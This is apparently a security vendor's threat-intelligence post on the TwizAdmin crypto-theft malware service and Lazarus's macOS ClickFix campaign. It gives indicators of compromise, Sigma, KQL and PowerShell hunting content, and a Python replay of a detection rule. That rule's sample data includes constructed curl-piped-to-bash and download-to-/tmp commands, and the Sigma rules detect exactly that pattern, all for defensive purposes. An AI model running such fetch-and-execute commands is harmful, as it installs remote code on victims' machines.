
TwizAdmin RaaS & Lazarus Mach-O Man: OTX Pulse Analysis — Multi-Stage Crypto Theft & macOS ClickFix

Security Arsenal Team
May 24, 2026
5 min read

Recent OTX Pulse data reveals a dangerous convergence of financially motivated Malware-as-a-Service (MaaS) operations and state-sponsored espionage activity. The DataBreachPlus group is actively pushing the TwizAdmin framework, a sophisticated multi-stage malware suite featuring crypto-clipping (targeting 8 chains), BIP-39 seed phrase theft, and a crpx0 ransomware module managed via a FastAPI C2 panel.

Simultaneously, the Lazarus Group has escalated campaigns against macOS users with the "Mach-O Man" toolkit. Utilizing a ClickFix social engineering vector—fake meeting invitations delivered via Telegram—Lazarus is tricking victims into running terminal commands that install the PyLangGhostRAT. This coincides with a massive expansion of hostile infrastructure in the Middle East, where over 1,350 C2 servers have been mapped across 98 providers, with STC (Saudi Arabia) hosting the majority of the command nodes supporting actors like APT28 and Energetic Bear.

Threat Actor / Malware Profile

DataBreachPlus / TwizAdmin

  • Type: Malware-as-a-Service (MaaS)
  • Distribution: Phishing campaigns mimicking logistics (e.g., FedEx) to deliver initial payloads.
  • Capabilities: Multi-platform (Windows/macOS). Features a clipboard hijacker for cryptocurrency theft, browser credential stealer, and a modular ransomware component (crpx0).
  • C2: FastAPI-based panel with a license key system, accessible via specific ports (e.g., 1337).

Lazarus Group / Mach-O Man

  • Type: Nation-State APT
  • Distribution: "ClickFix" attacks via Telegram. Victims receive fake collaboration links (Zoom/Teams) and are manipulated into executing a curl/bash one-liner in the terminal.
  • Capabilities: The "Mach-O Man" kit deploys PyLangGhostRAT, focusing on stealing browser data, cookies, and credentials. It utilizes Telegram for data exfiltration.
  • Targeting: Specifically aimed at Finance and Technology sectors leveraging macOS.

Regional Infrastructure (Middle East)

  • Actors: Eagle Werewolf, Energetic Bear, APT28, GrayCharlie.
  • Infrastructure: Massive utilization of residential and hosting providers. STC (Saudi Telecom) is a critical hub, hosting 72.4% of detected C2 servers. Infrastructure supports payloads ranging from Cobalt Strike to Mirai botnets.

IOC Analysis

The provided indicators of compromise (IOCs) require immediate triage:

  • Domains (fanonlyatn.xyz, livemicrosft.com): These serve as payload distribution points and C2 gateways. livemicrosft.com is a classic typo-squat of a Microsoft domain, used in the Lazarus ClickFix campaign to make the lure look legitimate.
  • File Hashes (SHA256): Numerous hashes relate to the TwizAdmin droppers, the Mach-O Man binaries, and the crpx0 ransomware payload. These must be blocked on endpoints and added to EDR denylists.
  • IPv4 Addresses: A list of Middle Eastern IPs (e.g., 37.32.15.8) linked to active C2 servers for various RATs (AsyncRAT, Sliver).

Operationalization: SOC teams should ingest these IOCs into SIEM correlation engines and EDR systems immediately. Focus on network egress alerts connecting to these specific IPs and domains.

Detection Engineering

YAML (Sigma rules)
title: Potential TwizAdmin FastAPI C2 Check-in
description: Detects a potential network connection to TwizAdmin C2 infrastructure, characterized by the API and license-check URI paths seen with the FastAPI panel, to the known distribution domain.
references:
  - https://intel.breakglass.tech/post/twizadmin-103-241-66
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
tags:
  - attack.c2
  - attack.command_and_control
logsource:
  category: proxy
detection:
  selection:
    c-uri|contains:
      - '/api/v1/'
      - '/license'
    cs-host|contains:
      - 'fanonlyatn.xyz'
  condition: selection
falsepositives:
  - Legitimate API traffic to whitelisted domains
level: high
---
title: Lazarus Group macOS ClickFix Execution Pattern
description: Detects the execution of suspicious commands via Terminal often seen in ClickFix attacks (curl | bash) targeting macOS.
references:
  - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
author: Security Arsenal
date: 2026/05/24
tags:
  - attack.execution
  - attack.user_execution
logsource:
  category: process_creation
  product: macos
detection:
  selection_img:
    Image|endswith:
      - '/bin/bash'
      - '/bin/sh'
      - '/bin/zsh'
  selection_downloader:
    CommandLine|contains:
      - 'curl '
      - 'wget '
  selection_pipe_or_redirect:
    CommandLine|contains:
      - ' | '
      - ' > '
  condition: all of selection_*
falsepositives:
  - Administrative script execution
level: high
---
title: Suspicious Mach-O Binary Creation in User Directory
description: Detects creation of application bundles or disk images (.app/.dmg) in temporary or user download directories, indicative of Mach-O Man malware deployment.
references:
  - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
author: Security Arsenal
date: 2026/05/24
tags:
  - attack.defense_evasion
  - attack.initial_access
logsource:
  category: file_creation
  product: macos
detection:
  selection:
    TargetFilename|contains:
      - '/Downloads/'
      - '/tmp/'
    TargetFilename|endswith:
      - '.app'
      - '.dmg'
  filter:
    Image|contains:
      - '/Installer.app/'
      - '/Software Update'
  condition: selection and not filter
level: medium
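The ClickFix process_creation rule above can be replayed as plain Python to check that its AND logic behaves as intended before it is deployed. This is an added example, not part of the original post or the ANY.RUN write-up; the events, users and example.invalid URLs are constructed sample data.

```python
import re
from typing import Dict, List, Optional

# Constructed macOS process_creation events using the field names the Sigma rule
# reads (Image, CommandLine). Sample data for this example, not campaign telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"User": "alice", "Image": "/bin/bash",
     "CommandLine": 'bash -c "curl -fsSL https://example.invalid/setup.sh | bash"'},
    {"User": "bob", "Image": "/bin/zsh",
     "CommandLine": "curl -s https://example.invalid/payload > /tmp/update"},
    {"User": "svc-backup", "Image": "/bin/sh",          # admin script: pipe but no downloader
     "CommandLine": "sh /usr/local/bin/backup.sh | tee /var/log/backup.log"},
    {"User": "alice", "Image": "/usr/bin/curl",        # curl itself, not a shell image
     "CommandLine": "curl -I https://example.invalid"},
    {"User": "carol", "Image": "/bin/bash",            # downloader but no pipe/redirect
     "CommandLine": "bash -c 'wget https://example.invalid/a.txt'"},
]

# Same literals as the Sigma rule's selection_img and the two CommandLine conditions.
SHELL_IMAGES = ("/bin/bash", "/bin/sh", "/bin/zsh")
DOWNLOADERS = ("curl ", "wget ")
PIPE_OR_REDIRECT = (" | ", " > ")
URL_RE = re.compile(r"https?://[^\s\"'|>]+")


def matches_clickfix_rule(event: Dict[str, str]) -> bool:
    """Sigma 'all of selection_*': shell image AND downloader AND pipe/redirect."""
    image = event.get("Image", "")
    cli = event.get("CommandLine", "")
    return (image.endswith(SHELL_IMAGES)
            and any(tool in cli for tool in DOWNLOADERS)
            and any(sep in cli for sep in PIPE_OR_REDIRECT))


def staged_url(event: Dict[str, str]) -> Optional[str]:
    """Pull the fetched URL out of the command line so the alert carries a blockable IOC."""
    m = URL_RE.search(event.get("CommandLine", ""))
    return m.group(0) if m else None


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return enriched alerts for every event the rule fires on."""
    return [{"user": ev.get("User", ""), "image": ev["Image"], "url": staged_url(ev)}
            for ev in events if matches_clickfix_rule(ev)]


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Only the two shell-launched curl commands with a pipe or redirect fire; the backup script, the bare curl process and the wget without a redirect are all dropped by the AND condition.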

KQL
// Hunt for TwizAdmin and Lazarus Mach-O Man Network Indicators
// Look for connections to known malicious domains and Middle East C2 IPs
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "fanonlyatn.xyz",
    "livemicrosft.com"
)
or RemoteIP in (
    "37.32.15.8",
    "197.51.170.131",
    "5.109.182.231",
    "93.113.62.247",
    "94.252.245.193"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX Pulse TwizAdmin/Lazarus"

PowerShell
<#
.SYNOPSIS
    IOC Hunt Script for TwizAdmin and Mach-O Man Hashes
.DESCRIPTION
    Scans the file system for specific SHA256 hashes associated with the active campaigns.
#>

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
    "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
    "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
    "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
    "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
)

Write-Host "Starting IOC Hunt for TwizAdmin/Mach-O Man Hashes..." -ForegroundColor Cyan

$DrivesToScan = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

# Hash every file once and compare it against the whole target list, instead of
# re-walking the file system once per hash.
foreach ($Drive in $DrivesToScan) {
    Write-Host "Scanning drive: $Drive" -ForegroundColor Yellow
    # -File skips directories (Get-FileHash cannot hash them); -Force includes hidden files
    Get-ChildItem -Path $Drive -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $FilePath = $_.FullName
        try {
            $FileHash = (Get-FileHash -LiteralPath $FilePath -Algorithm SHA256 -ErrorAction Stop).Hash
            # -contains is case-insensitive, so the upper-case hash returned by Get-FileHash
            # still matches the lower-case entries in $TargetHashes
            if ($TargetHashes -contains $FileHash) {
                Write-Host "[MATCH] Malicious file found: $FilePath" -ForegroundColor Red
            }
        } catch {
            # Ignore locked files and access-denied errors
        }
    }
}
Write-Host "Scan Complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all listed domains and IP addresses at the perimeter firewall and proxy. Quarantine any endpoints matching the provided file hashes.
  • 24h: Initiate credential resets for users who may have interacted with "FedEx" themed lures or fake meeting invites. Hunt for persistence mechanisms associated with FastAPI panels and LaunchAgents referencing Mach-O binaries.
  • 1 Week: Conduct security awareness training focused on identifying "ClickFix" attacks (browser popups asking for terminal commands). Review egress traffic policies specifically for connections to Saudi Arabia-based IP ranges (STC) unless business justified.
